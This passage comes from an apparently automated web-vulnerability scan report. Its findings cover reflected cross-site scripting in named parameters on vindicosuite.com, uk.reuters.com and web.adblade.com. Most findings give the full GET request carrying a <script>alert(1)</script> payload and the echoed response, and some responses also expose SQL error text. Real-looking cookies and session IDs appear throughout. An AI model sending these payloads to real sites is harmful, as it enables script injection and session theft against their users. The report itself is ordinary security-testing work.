Set-Cookie: ASPSESSIONIDSQQTQBCC=PHCNDMJDEPBPDNELIDEAPDEJ; path=/
X-Powered-By: ASP.NET
Content-Length: 1444
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'dd59d'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = 21772, @campaignId = 6468, @syndicationOutletId = 49160, @adrotationId = 13047dd59d<script>alert(1)</script>8144e049832, @ipAddress = '173.193.214.243', @sessionId = '969182383', @pixel = '0', @ipNumber = '2915161843', @referer = 'http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?banner
...[SNIP]...

1.267. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the bannerCreativeAdModuleId request parameter is copied into the HTML document as plain text between tags. The payload 3c753<script>alert(1)</script>e9addd225f2 was submitted in the bannerCreativeAdModuleId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=217723c753<script>alert(1)</script>e9addd225f2 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:42:08 GMT
Expires: Mon, 14 Feb 2011 01:42:09 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCRTSCDC=DDKLPDEAFPAGBNIODELMLMFN; path=/
X-Powered-By: ASP.NET
Content-Length: 1442
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'c753'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = 217723c753<script>alert(1)</script>e9addd225f2, @campaignId = 6468, @syndicationOutletId = 49160, @adrotationId = 13047, @ipAddress = '173.193.214.243', @sessionId = '71285301', @pixel = '0', @ipNumber = '2915161843', @referer = 'http://cache.vind
...[SNIP]...

1.268. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the campaignId request parameter is copied into the HTML document as plain text between tags. The payload f3b31<script>alert(1)</script>08a31efa6d8 was submitted in the campaignId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468f3b31<script>alert(1)</script>08a31efa6d8&adRotationId=13047&bannerCreativeAdModuleId=21772 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:41:40 GMT
Expires: Mon, 14 Feb 2011 01:41:41 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQCTSDDAB=CKHBBJJDLLFMBPOFCGGPPPLL; path=/
X-Powered-By: ASP.NET
Content-Length: 1444
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'f3b31'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = 21772, @campaignId = 6468f3b31<script>alert(1)</script>08a31efa6d8, @syndicationOutletId = 49160, @adrotationId = 13047, @ipAddress = '173.193.214.243', @sessionId = '965860069', @pixel = '0', @ipNumber = '2915161843', @referer = 'http://cache.vindicosuite.com/Feeds/
...[SNIP]...

1.269. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the siteId request parameter is copied into the HTML document as plain text between tags. The payload e110e<script>alert(1)</script>58ad681b7d5 was submitted in the siteId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55e110e<script>alert(1)</script>58ad681b7d5&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=21772 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:41:06 GMT
Expires: Mon, 14 Feb 2011 01:41:06 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCSBCCTBC=JNHLGMJDDEIFFMLKCFPLFICO; path=/
X-Powered-By: ASP.NET
Content-Length: 1440
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'e'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55e110e<script>alert(1)</script>58ad681b7d5, @bannerCreativeAdModuleId = 21772, @campaignId = 6468, @syndicationOutletId = 49160, @adrotationId = 13047, @ipAddress = '173.193.214.243', @sessionId = '969372960', @pixel = '0', @ipNumber = '291516
...[SNIP]...

1.270. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the syndicationOutletId request parameter is copied into the HTML document as plain text between tags. The payload 86b3e<script>alert(1)</script>9aa31f72b87 was submitted in the syndicationOutletId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=4916086b3e<script>alert(1)</script>9aa31f72b87&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=21772 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:41:18 GMT
Expires: Mon, 14 Feb 2011 01:41:19 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSACDSAD=BLAKANJDADMMFKBPOLFENHHI; path=/
X-Powered-By: ASP.NET
Content-Length: 1442
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'b3e'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = 21772, @campaignId = 6468, @syndicationOutletId = 4916086b3e<script>alert(1)</script>9aa31f72b87, @adrotationId = 13047, @ipAddress = '173.193.214.243', @sessionId = '970022704', @pixel = '0', @ipNumber = '2915161843', @referer = 'http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_Ba
...[SNIP]...

1.271. http://uk.reuters.com/assets/commentsChild [articleId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://uk.reuters.com
Path:   /assets/commentsChild

Issue detail

The value of the articleId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fac44"><script>alert(1)</script>b818c7a361b was submitted in the articleId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/commentsChild?articleId=UKTRE71C1YB20110213fac44"><script>alert(1)</script>b818c7a361b&headline=%27%27The+King%27s+Speech%27%27+royal+winner+at+BAFTA+awards&channel=lifestyleMolt&edition=UK&view=base HTTP/1.1
Host: uk.reuters.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie; adDisplayManager=freqCap_fixedpanel=1297647341048~1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 4288

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: produk-web-09 <![endif]-->
<!--[if !IE]> token: a03a4b1f-8f2f-4acd-99d4-9495c4db1628 <![
...[SNIP]...
<input type="hidden" name="article_id" value="UKTRE71C1YB20110213fac44"><script>alert(1)</script>b818c7a361b" />
...[SNIP]...

1.272. http://uk.reuters.com/assets/commentsChild [channel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://uk.reuters.com
Path:   /assets/commentsChild

Issue detail

The value of the channel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 281d2"><script>alert(1)</script>31d7addbad8 was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/commentsChild?articleId=UKTRE71C1YB20110213&headline=%27%27The+King%27s+Speech%27%27+royal+winner+at+BAFTA+awards&channel=lifestyleMolt281d2"><script>alert(1)</script>31d7addbad8&edition=UK&view=base HTTP/1.1
Host: uk.reuters.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie; adDisplayManager=freqCap_fixedpanel=1297647341048~1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 4611

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: produk-web-02 <![endif]-->
<!--[if !IE]> token: 713cd201-ddcb-44ba-94cd-1013a824fea5 <![
...[SNIP]...
<input type="hidden" name="channel" value="lifestyleMolt281d2"><script>alert(1)</script>31d7addbad8" />
...[SNIP]...

1.273. http://uk.reuters.com/assets/sharedModuleJS [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://uk.reuters.com
Path:   /assets/sharedModuleJS

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 4ee36<script>alert(1)</script>25f5b98f8d4 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/sharedModuleJS?view=RSM-UK-NavFlyoutContent1&globalJSVariable=&callback=Reuters.nav.callback14ee36<script>alert(1)</script>25f5b98f8d4&sp= HTTP/1.1
Host: uk.reuters.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:44 GMT
Server: Apache-Coyote/1.1
Last-UpdatedL: Mon, 14 Feb 2011 01:27:35 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 12326

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: produk-web-09 <![endif]-->
<!--[if !IE]> token: 39ab1270-bb2b-4b67-8fbe-18e888adf9a2 <![endif]-->
Reuters.nav.callback14ee36<script>alert(1)</script>25f5b98f8d4('<div class="section">
...[SNIP]...

1.274. http://uk.reuters.com/assets/sharedModuleJS [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://uk.reuters.com
Path:   /assets/sharedModuleJS

Issue detail

The value of the sp request parameter is copied into an HTML comment. The payload 112a5--><script>alert(1)</script>3821ad28cd4 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/sharedModuleJS?view=RSM-UK-NavFlyoutContent1&globalJSVariable=&callback=Reuters.nav.callback1&sp=112a5--><script>alert(1)</script>3821ad28cd4 HTTP/1.1
Host: uk.reuters.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:46 GMT
Server: Apache-Coyote/1.1
Last-UpdatedL: Mon, 14 Feb 2011 01:27:35 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 15063

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: produk-web-04 <![endif]-->
<!--[if !IE]> token: 949f6358-57b7-41d4-bcd0-360fe5318e95 <![
...[SNIP]...
<a href="112a5--><script>alert(1)</script>3821ad28cd4/business/summits">
...[SNIP]...

1.275. http://uk.reuters.com/assets/sharedModuleJS [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://uk.reuters.com
Path:   /assets/sharedModuleJS

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5722"><script>alert(1)</script>7a186b758c3 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/sharedModuleJS?view=RSM-UK-NavFlyoutContent1&globalJSVariable=&callback=Reuters.nav.callback1&sp=f5722"><script>alert(1)</script>7a186b758c3 HTTP/1.1
Host: uk.reuters.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:44 GMT
Server: Apache-Coyote/1.1
Last-UpdatedL: Mon, 14 Feb 2011 01:27:35 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 15000

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: produk-web-01 <![endif]-->
<!--[if !IE]> token: 32575fb7-ba79-4402-8b83-78ce948e5702 <![
...[SNIP]...
<a href="f5722"><script>alert(1)</script>7a186b758c3/business">
...[SNIP]...

1.276. http://uk.reuters.com/tracker/guid [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://uk.reuters.com
Path:   /tracker/guid

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 71566%3balert(1)//4e176012b68 was submitted in the cb parameter. This input was echoed as 71566;alert(1)//4e176012b68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tracker/guid?cb=doTrack783971566%3balert(1)//4e176012b68 HTTP/1.1
Host: uk.reuters.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie; adDisplayManager=freqCap_fixedpanel=1297647341048~1; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297668987403:ss=1297668987403; __utmz=28259640.1297647396.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=28259640.2003575633.1297647396.1297647396.1297647396.1; __utmc=28259640; __utmb=28259640.1.10.1297647396; rsi_segs=D08734_70009|D08734_70011|D08734_70049|D08734_70057|D08734_70075|D08734_70086|D08734_70093|D08734_70509|D08734_71432

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:39:19 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: text/javascript
Connection: close
Content-Length: 150

typeof doTrack783971566;alert(1)//4e176012b68==='function'&&doTrack783971566;alert(1)//4e176012b68({"userID":"cb1e43fa-a25f-4a75-8476-7ef823b513a4"});

1.277. http://web.adblade.com/imps.php [description_color parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The value of the description_color request parameter is copied into an HTML comment. The payload c7eec--><script>alert(1)</script>9b898ec0147 was submitted in the description_color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imps.php?app=3452&ad_width=876&ad_height=200&img_pad=2&title_font=1&title_color=0066cc&description_font=1&description_color=000000c7eec--><script>alert(1)</script>9b898ec0147&id=111&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-806598134-1296072892362; __tuid=3911816417148998155; __esgs=G6LakLyNC66xftdQujJgAKhNo%2BVdJNvT4b1UxBBAJu4%3D; __sgs=zBgkd9JWM%2F7wEn91CzQUOJmrNvQIA6tPw07aWYGFqD8%3D

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __impt=1297646101.66437087108; expires=Tue, 15-Feb-2011 01:15:01 GMT; path=/
Content-type: text/html
Date: Mon, 14 Feb 2011 01:15:01 GMT
Server: lighttpd/1.4.21
Content-Length: 15623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
font-family:Arial,Helvetica,sans-serif; }
.adDescription1_111, .adDescription1_111:link, .adDescription1_111:visited, .adDescription1_111:hover {
color:#000000c7eec--><script>alert(1)</script>9b898ec0147; font-family:Arial,Helvetica,sans-serif; }
.adImage1_111 {
padding-left:2px; }
-->
...[SNIP]...

1.278. http://web.adblade.com/imps.php [img_pad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The value of the img_pad request parameter is copied into an HTML comment. The payload 64375--><script>alert(1)</script>cad48fafda7 was submitted in the img_pad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imps.php?app=3452&ad_width=876&ad_height=200&img_pad=264375--><script>alert(1)</script>cad48fafda7&title_font=1&title_color=0066cc&description_font=1&description_color=000000&id=111&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-806598134-1296072892362; __tuid=3911816417148998155; __esgs=G6LakLyNC66xftdQujJgAKhNo%2BVdJNvT4b1UxBBAJu4%3D; __sgs=zBgkd9JWM%2F7wEn91CzQUOJmrNvQIA6tPw07aWYGFqD8%3D

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __impt=1297646085.89059849331; expires=Tue, 15-Feb-2011 01:14:45 GMT; path=/
Content-type: text/html
Date: Mon, 14 Feb 2011 01:14:45 GMT
Server: lighttpd/1.4.18
Content-Length: 15350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
n1_111:visited, .adDescription1_111:hover {
color:#000000; font-family:Arial,Helvetica,sans-serif; }
.adImage1_111 {
padding-left:264375--><script>alert(1)</script>cad48fafda7px; }
-->
...[SNIP]...

1.279. http://web.adblade.com/imps.php [title_color parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The value of the title_color request parameter is copied into an HTML comment. The payload f56a6--><script>alert(1)</script>45d104bf298 was submitted in the title_color parameter. This input was echoed unmodified in the application's response.

